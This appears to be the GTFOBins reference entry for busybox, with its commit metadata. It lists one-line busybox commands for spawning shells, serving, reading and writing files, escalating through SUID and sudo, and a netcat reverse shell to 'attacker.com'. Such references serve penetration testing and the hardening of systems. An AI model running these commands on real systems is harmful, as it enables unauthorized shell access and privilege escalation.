GTFOBins.github.io/_gtfobins/busybox.md
astor9 a5a1f86b97
Added reverse shell functionality to busybox if "busybox nc" is available
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-12-23 13:03:05 +01:00

938 B

description functions
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFOBins binaries are supported. Here some example.
shell file-upload file-write file-read suid sudo reverse-shell
code
busybox sh
description code
Serve files in the local folder running an HTTP server. LPORT=12345 busybox httpd -f -p $LPORT -h .
code
LFILE=file_to_write busybox sh -c 'echo "DATA" > $LFILE'
code
LFILE=file_to_read ./busybox cat "$LFILE"
description code
It may drop the SUID privileges depending on the compilation flags and the runtime configuration. ./busybox sh
code
sudo busybox sh
description code
Run `nc -lvp 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 busybox nc -e /bin/sh $RHOST $RPORT